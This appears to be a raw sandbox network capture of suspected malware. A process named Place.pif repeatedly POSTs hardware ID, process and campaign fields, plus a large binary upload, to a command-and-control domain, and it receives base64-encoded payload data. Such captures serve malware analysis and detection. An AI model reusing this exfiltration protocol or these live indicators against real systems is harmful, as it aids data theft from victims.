vRFE3c3LilaWbmKXFQ/NY4ISHBL0gah8U2OleSAfdXQ9MbTpab8656IrJgW3HIkRwaZdJrV1mDxnltH95Mu1hUlUoCuYXzrHdmoSdHN86YWUMh0mhXXIXFd2Qfmwr/XkrTEU2Yl/mtdSqwY192xZ8WEGSeLxFdmIkuIiadFOxPQJUNDIXS/64xfv5oTH3DmhwUZN1uVleGxXxrH5gN8k1P2RxFkp72r3slsykQN86MWUMh8mZcdIvFcSII0Bu7W
2024-10-28 13:07:56 UTC	1369	IN	Data Raw: 43 78 4e 4c 4f 70 57 45 32 76 53 74 76 59 63 71 43 45 68 5a 74 6e 6e 34 66 51 38 44 4f 65 69 4a 50 33 67 54 30 56 6b 2f 61 45 30 75 51 6e 2f 32 72 64 43 65 34 62 56 52 39 79 5a 49 66 47 6d 54 55 59 6c 42 51 69 63 35 2b 5a 52 53 4d 51 72 55 66 53 38 31 53 47 74 79 37 2f 37 42 2f 4e 76 35 32 45 47 36 4a 6b 78 56 62 4f 5a 35 6c 57 31 57 45 7a 6e 70 6b 45 70 67 50 2b 6c 42 4e 31 52 31 47 6c 35 76 2b 6f 33 77 6a 73 32 31 4d 66 63 4b 62 46 52 4a 74 30 79 45 66 47 6f 66 52 4e 6a 70 58 72 77 2f 31 55 55 76 44 55 6c 33 53 69 37 69 6c 66 57 62 6d 4b 56 39 37 78 70 63 57 47 47 4c 66 61 30 4e 49 6a 4d 42 2b 5a 78 75 56 44 50 31 4e 53 74 6f 62 51 5a 2b 62 2f 36 70 39 4c 4c 31 75 48 6a 6d 4a 6b 77 46 62 4f 5a 35 43 52 6b 71 4e 69 57 6b 73 44 74 34 46 39 78 38 55 6c 52 Data Ascii: CxNLOpWE2vStvYcqCEhZtnn4fQ8DOeiJP3gT0Vk/aE0uQn/2rdCe4bVR9yZIfGmTUYlBQic5+ZRSMQrUfS81SGty7/7B/Nv52EG6JkxVbOZ5lW1WEznpkEpgP+lBN1R1Gl5v+o3wjs21MfcKbFRJt0yEfGofRNjpXrw/1UUvDUl3Si7ilfWbmKV97xpcWGGLfa0NIjMB+ZxuVDP1NStobQZ+b/6p9LL1uHjmJkwFbOZ5CRkqNiWksDt4F9x8UlR
2024-10-28 13:07:56 UTC	1369	IN	Data Raw: 39 36 31 34 4c 37 70 68 58 58 66 4e 6b 42 34 65 59 74 4a 71 56 6c 6d 50 7a 58 39 73 48 70 46 43 74 52 39 4c 7a 56 49 61 33 4c 50 6a 6f 58 30 72 2f 6e 59 51 62 6f 6d 54 46 56 73 35 6e 6d 31 66 58 34 44 44 63 47 59 53 6d 41 6a 2b 58 30 66 57 48 55 61 61 6c 76 65 69 65 69 2b 2f 62 31 74 39 77 70 49 55 47 47 66 59 49 52 38 61 68 39 45 32 4f 6c 65 2b 47 66 5a 54 53 35 55 4e 44 49 58 53 2f 36 34 78 66 76 35 69 55 6e 50 4f 6c 42 51 59 61 64 74 6c 57 31 2b 41 77 57 52 71 46 35 6b 51 36 56 39 46 30 42 35 42 6e 4a 62 2b 71 33 63 6c 75 69 6b 51 4e 38 36 4d 57 55 4d 68 38 32 31 57 63 34 66 53 4e 6e 31 5a 68 30 4c 38 55 77 79 4e 55 6b 4f 58 6d 50 65 76 63 69 43 39 59 6c 74 39 79 4a 4d 52 46 6e 50 64 62 6c 35 65 67 4d 5a 77 5a 42 61 52 42 50 78 57 54 64 30 56 41 74 4c Data Ascii: 9614L7phXXfNkB4eYtJqVlmPzX9sHpFCtR9LzVIa3LPjoX0r/nYQbomTFVs5nm1fX4DDcGYSmAj+X0fWHUaalveiei+/b1t9wpIUGGfYIR8ah9E2Ole+GfZTS5UNDIXS/64xfv5iUnPOlBQYadtlW1+AwWRqF5kQ6V9F0B5BnJb+q3cluikQN86MWUMh821Wc4fSNn1Zh0L8UwyNUkOXmPevciC9Ylt9yJMRFnPdbl5egMZwZBaRBPxWTd0VAtL
2024-10-28 13:07:56 UTC	1369	IN	Data Raw: 79 79 35 65 56 6c 67 78 74 52 58 57 32 36 65 4f 57 67 61 69 63 35 74 63 77 47 54 45 76 77 66 63 35 74 53 57 74 7a 4b 75 4a 64 79 4b 4c 42 75 53 47 61 45 73 77 38 52 5a 73 35 6d 52 6c 58 41 68 7a 5a 6b 56 38 5a 52 74 52 39 49 78 46 49 61 7a 4d 43 6a 39 79 4a 78 37 6a 74 42 4f 64 44 55 44 31 73 35 6a 43 38 52 53 4d 43 52 4e 69 55 55 6a 42 44 39 58 46 72 57 56 58 79 69 74 65 4b 76 64 7a 47 76 56 32 42 77 30 35 6b 66 44 48 43 53 64 46 4a 55 6a 73 35 67 49 6c 6e 65 44 62 73 48 64 5a 56 61 41 71 50 63 75 4c 6f 78 66 76 35 63 58 58 6e 48 6b 77 38 4b 4c 50 6c 37 58 46 79 58 32 44 59 73 56 35 68 43 6f 77 38 43 6c 52 5a 54 33 4d 71 6f 38 43 70 7a 37 54 34 4f 4a 64 62 61 41 46 74 33 6e 6a 6b 44 46 4d 44 62 4e 6a 70 58 32 51 48 70 54 55 72 57 42 45 48 62 72 4d 61 4d Data Ascii: yy5eVlgxtRXW26eOWgaic5tcwGTEvwfc5tSWtzKuJdyKLBuSGaEsw8RZs5mRlXAhzZkV8ZRtR9IxFIazMCj9yJx7jtBOdDUD1s5jC8RSMCRNiUUjBD9XFrWVXyiteKvdzGvV2Bw05kfDHCSdFJUjs5gIlneDbsHdZVaAqPcuLoxfv5cXXnHkw8KLPl7XFyX2DYsV5hCow8ClRZT3Mqo8Cpz7T4OJdbaAFt3njkDFMDbNjpX2QHpTUrWBEHbrMaM
2024-10-28 13:07:56 UTC	1069	IN	Data Raw: 70 51 65 63 36 43 43 46 5a 47 30 47 5a 51 54 4a 44 65 65 53 4a 5a 33 67 53 37 42 78 36 62 55 6b 61 4e 30 71 44 79 49 33 33 72 4f 67 6b 6e 6d 34 74 58 41 69 48 49 49 51 6b 49 7a 6f 6c 6b 49 6b 2f 65 52 66 68 4e 58 74 4d 52 56 4a 2f 56 78 70 78 57 4b 4c 6c 6f 53 47 66 65 6d 31 59 31 56 2f 39 66 62 30 2b 44 78 33 68 6c 41 59 39 43 74 52 39 44 6c 55 70 37 33 4e 71 34 6e 54 39 6d 70 69 6b 47 4e 2f 79 58 46 78 56 6d 79 48 41 63 66 59 37 4f 64 33 51 48 69 51 32 30 63 58 72 30 55 67 7a 63 6c 4c 6a 36 49 32 6a 2b 62 55 38 33 6b 63 52 4c 51 44 53 4e 4e 67 45 49 6e 34 64 76 49 67 48 65 57 71 6b 52 44 4d 64 53 47 74 7a 56 2b 37 42 6a 49 4c 31 2f 58 54 44 33 71 6a 34 56 5a 74 39 33 51 56 65 4d 36 48 56 7a 48 61 41 38 37 6c 78 43 32 78 56 55 6a 64 4b 32 34 6e 35 6d 35 Data Ascii: pQec6CCFZG0GZQTJDeeSJZ3gS7Bx6bUkaN0qDyI33rOgknm4tXAiHIIQkIzolkIk/eRfhNXtMRVJ/VxpxWKLloSGfem1Y1V/9fb0+Dx3hlAY9CtR9DlUp73Nq4nT9mpikGN/yXFxVmyHAcfY7Od3QHiQ20cXr0UgzclLj6I2j+bU83kcRLQDSNNgEIn4dvIgHeWqkRDMdSGtzV+7BjIL1/XTD3qj4VZt93QVeM6HVzHaA87lxC2xVUjdK24n5m5
2024-10-28 13:07:56 UTC	1369	IN	Data Raw: 31 65 63 62 0d 0a 6c 42 30 32 34 59 66 47 48 66 64 4a 6d 39 6b 70 63 52 37 5a 78 6d 5a 50 4d 56 2b 52 73 55 66 54 5a 76 51 32 4b 56 6e 4a 59 42 58 61 57 62 4f 68 46 73 39 59 73 68 69 45 52 54 41 30 54 59 36 56 37 38 49 36 31 4a 44 30 6c 42 69 6d 34 54 37 34 6a 39 6d 75 69 6b 47 4e 2b 79 5a 46 42 35 76 32 53 4e 77 55 4a 44 45 65 57 56 56 76 67 58 74 58 41 79 62 55 6b 37 63 79 72 69 6a 65 7a 61 7a 5a 6c 6b 37 7a 6f 34 65 57 79 2b 65 62 78 45 43 77 4d 68 38 63 68 71 52 42 62 64 5a 51 74 74 53 58 64 4b 4c 75 4c 51 78 66 75 30 6e 48 6d 57 4a 7a 46 6c 63 59 73 78 7a 56 31 6d 57 79 6a 46 63 4b 62 4d 51 2f 45 39 50 6c 79 4e 50 6d 49 54 74 6f 57 45 68 67 46 64 7a 5a 63 36 45 47 6c 6c 51 79 47 4a 52 56 49 65 4a 4f 43 49 50 33 6c 71 37 63 6c 37 53 41 6b 48 63 6a 62 Data Ascii: 1ecblB024YfGHfdJm9kpcR7ZxmZPMV+RsUfTZvQ2KVnJYBXaWbOhFs9YshiERTA0TY6V78I61JD0lBim4T74j9muikGN+yZFB5v2SNwUJDEeWVVvgXtXAybUk7cyrijezazZlk7zo4eWy+ebxECwMh8chqRBbdZQttSXdKLuLQxfu0nHmWJzFlcYsxzV1mWyjFcKbMQ/E9PlyNPmITtoWEhgFdzZc6EGllQyGJRVIeJOCIP3lq7cl7SAkHcjb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49917	104.21.9.13	443	7132	C:\Users\user\AppData\Local\Temp\756341\Place.pif

Timestamp	Bytes transferred	Direction	Data
2024-10-28 13:07:57 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12836 Host: faulteyotk.site
2024-10-28 13:07:57 UTC	12836	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 39 32 42 39 44 30 30 38 30 41 43 33 45 43 42 33 30 37 46 33 45 43 41 31 43 34 33 45 36 38 35 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 49 52 69 61 46 69 2d 2d 32 38 31 30 6d Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"992B9D0080AC3ECB307F3ECA1C43E685--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"IRiaFi--2810m
2024-10-28 13:07:57 UTC	1026	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 13:07:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=7apm4eudvgfmjdeh0kfcl5rfer; expires=Fri, 21 Feb 2025 06:54:36 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=StADzm%2ByqyjktCvn03ksdQsyFhl1%2Fea%2F2Da3tPk%2FhlC1ufsaxFNv%2Fqw%2Buy4Xs%2BVeOKiqR0ED3FzLOFrYBzp%2BPe8IHXURtoOnvKPRwv3fjleu%2FpwgxHHXg%2BJ4sK1H3Ck4ffI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d9b26da6dec4749-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1108&sent=8&recv=17&lost=0&retrans=0&sent_bytes=2837&recv_bytes=13775&delivery_rate=2588025&cwnd=248&unsent_bytes=0&cid=7f36f8e1eb456e4e&ts=643&x=0"
2024-10-28 13:07:57 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 0d 0a Data Ascii: 11ok 155.94.241.188
2024-10-28 13:07:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49928	104.21.9.13	443	7132	C:\Users\user\AppData\Local\Temp\756341\Place.pif

Timestamp	Bytes transferred	Direction	Data
2024-10-28 13:07:58 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15078 Host: faulteyotk.site
2024-10-28 13:07:58 UTC	15078	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 39 32 42 39 44 30 30 38 30 41 43 33 45 43 42 33 30 37 46 33 45 43 41 31 43 34 33 45 36 38 35 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 49 52 69 61 46 69 2d 2d 32 38 31 30 6d Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"992B9D0080AC3ECB307F3ECA1C43E685--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"IRiaFi--2810m
2024-10-28 13:07:59 UTC	1017	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 13:07:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=oaqvup148papvrvnbu6t87ea56; expires=Fri, 21 Feb 2025 06:54:37 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1pWbnvIM1tGUBNW4gQGG1aX2M%2B%2FS%2FOL2Y3bsCWX0Xvy%2FAXwwDQOKdDhfzRgDLSDp9K1mMiZMTrqujyri6MCWuZJlIpsOnsm%2BkLONdIfw9xltoXKvnqzR7CrTGI4di0mIo5k%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d9b26e30b7c4617-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1149&sent=11&recv=21&lost=0&retrans=0&sent_bytes=2835&recv_bytes=16017&delivery_rate=2258970&cwnd=251&unsent_bytes=0&cid=b10a81a8d4d7a60f&ts=539&x=0"
2024-10-28 13:07:59 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 0d 0a Data Ascii: 11ok 155.94.241.188
2024-10-28 13:07:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49936	104.21.9.13	443	7132	C:\Users\user\AppData\Local\Temp\756341\Place.pif

Timestamp	Bytes transferred	Direction	Data
2024-10-28 13:07:59 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20568 Host: faulteyotk.site
2024-10-28 13:07:59 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 39 32 42 39 44 30 30 38 30 41 43 33 45 43 42 33 30 37 46 33 45 43 41 31 43 34 33 45 36 38 35 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 49 52 69 61 46 69 2d 2d 32 38 31 30 6d Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"992B9D0080AC3ECB307F3ECA1C43E685--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"IRiaFi--2810m
2024-10-28 13:07:59 UTC	5237	OUT	Data Raw: 35 13 92 cd 36 8a 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 56vMMZh'F3Wun 4F([:7s~X`nO
2024-10-28 13:08:00 UTC	1015	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 13:08:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=cpui9cvlseapisemphe1lm1o86; expires=Fri, 21 Feb 2025 06:54:39 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vqzEGLoAFncTNi1tpUNtkUgW0cO8CwkLFF9k9duhC2Gi0gFBKG40romMSN3GSXotmdG4oHfTlV2m1%2BqFdMiiXqbP7mc%2F7jY7O%2Bs0Idjl%2B3q5vYQWPWL8Vv1U2rn1q3DJ674%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d9b26ebea2c4792-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1144&sent=12&recv=26&lost=0&retrans=0&sent_bytes=2836&recv_bytes=21529&delivery_rate=2500863&cwnd=251&unsent_bytes=0&cid=5dd1e1373c97b442&ts=598&x=0"
2024-10-28 13:08:00 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 0d 0a Data Ascii: 11ok 155.94.241.188
2024-10-28 13:08:00 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49946	104.21.9.13	443	7132	C:\Users\user\AppData\Local\Temp\756341\Place.pif

Timestamp	Bytes transferred	Direction	Data
2024-10-28 13:08:01 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1239 Host: faulteyotk.site
2024-10-28 13:08:01 UTC	1239	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 39 32 42 39 44 30 30 38 30 41 43 33 45 43 42 33 30 37 46 33 45 43 41 31 43 34 33 45 36 38 35 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 49 52 69 61 46 69 2d 2d 32 38 31 30 6d Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"992B9D0080AC3ECB307F3ECA1C43E685--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"IRiaFi--2810m
2024-10-28 13:08:01 UTC	1010	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 13:08:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=tq2mmrk4632i0ruke3if539s55; expires=Fri, 21 Feb 2025 06:54:40 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=csPt5axlmvhwA0HyY5UrtX0QNs0318PDa3XlZA8kYGaWFDXAxjZlPgTHn8RF6IeqduwJKHWusN8%2B259RVtMI94I28lw68aTsyY5Yr9gP8xDtO5BwggVF%2F%2FoGQh0535AXx8o%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d9b26f46c1ea927-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1350&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=2155&delivery_rate=2253696&cwnd=251&unsent_bytes=0&cid=789013177b8c8c29&ts=533&x=0"
2024-10-28 13:08:01 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 0d 0a Data Ascii: 11ok 155.94.241.188
2024-10-28 13:08:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49956	104.21.9.13	443	7132	C:\Users\user\AppData\Local\Temp\756341\Place.pif

Timestamp	Bytes transferred	Direction	Data
2024-10-28 13:08:02 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 579019 Host: faulteyotk.site
2024-10-28 13:08:02 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 39 32 42 39 44 30 30 38 30 41 43 33 45 43 42 33 30 37 46 33 45 43 41 31 43 34 33 45 36 38 35 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 49 52 69 61 46 69 2d 2d 32 38 31 30 6d Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"992B9D0080AC3ECB307F3ECA1C43E685--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"IRiaFi--2810m
2024-10-28 13:08:02 UTC	15331	OUT	Data Raw: 07 c7 86 e3 08 63 72 0d ce 91 13 07 30 9b 27 23 d8 41 82 d0 0e 31 f4 75 0e 12 e5 5f d1 40 18 6c b9 1a a5 a6 87 1f 24 1b 6e 2e 47 e3 48 07 cd 6b e8 68 3d 3b 10 75 80 e3 e1 c6 98 d9 48 d4 47 4b 3f 08 67 c8 16 68 32 df 6d a2 05 eb 77 e5 7e fb d9 69 cf fe ec 2e 13 15 92 a4 43 ab 86 b4 8b 90 38 07 81 2d 1e 5e bc 57 ff c5 0f 46 1a ec a4 2c 36 1b 2c c4 d7 ca 6d 2a cc 18 46 2c 3e 30 1d df 70 10 a2 92 19 39 88 d2 5a d3 9c 79 b9 0a fc 0f d0 b4 d1 c1 04 30 dd 8f 5e da 09 a4 84 a8 a4 6c de 30 2c 41 51 9b e3 63 9e a8 3f d9 6d 09 ef 0a 09 2d 26 2c be 4e d5 e4 49 42 ed 96 0b a4 9f 61 60 c8 1e f9 8f 9f 58 9d d4 73 5d 85 dc ba ac 1a b2 a3 1b 10 3a 83 62 e7 8d 23 81 d1 d2 cd 46 b5 b6 5b 4c 8b a9 96 1d 3d ab d7 9b ea 79 f5 b1 a1 19 90 25 0f 59 36 3a 16 9e 41 1d bf d3 1a c4 Data Ascii: cr0'#A1u_@l$n.GHkh=;uHGK?gh2mw~i.C8-^WF,6,m*F,>0p9Zy0^l0,AQc?m-&,NIBa`Xs]:b#F[L=y%Y6:A
2024-10-28 13:08:02 UTC	15331	OUT	Data Raw: 50 3e 12 87 e3 67 22 0c d1 a9 a4 d4 22 53 55 ae 12 68 50 d9 7e f9 aa 3e 63 19 79 4e aa 3c 2e 4d 08 1a 50 59 27 93 33 ca d7 a3 8d cc da 03 6f a9 0f 4b 5e e5 6a 7a ab d0 d4 70 4b e5 f8 58 46 32 35 e5 ac 13 9f 90 68 cf 87 05 21 b9 b1 60 6c 2c 61 73 b3 16 2f 27 c9 d3 b3 97 34 68 63 67 ab d3 9b 82 7c eb 8e 27 ba 24 53 a1 40 c8 39 ee ae ce ca c5 09 13 cc 9c 22 fb 49 89 8f d7 01 72 6c 28 7d 57 68 43 73 e2 a5 5a fd 9d cd ef af fb d4 59 0d 02 e9 61 dc 2c fa d7 0d e7 87 61 24 54 ff a3 48 3f 3e d7 57 db bb 3b 8e 3f 43 39 c6 0f a4 29 01 99 f8 d4 92 53 77 64 b8 29 4f 46 e8 35 23 d5 ed 97 c2 06 8a 87 5e bd 19 9e f1 7e fb 53 8c f5 d2 99 fb 24 94 36 a1 f2 26 68 7a e5 21 c4 fc 14 c8 f9 72 49 7b dc 20 90 53 9e 38 78 28 3f 43 98 31 62 d5 51 d5 15 be 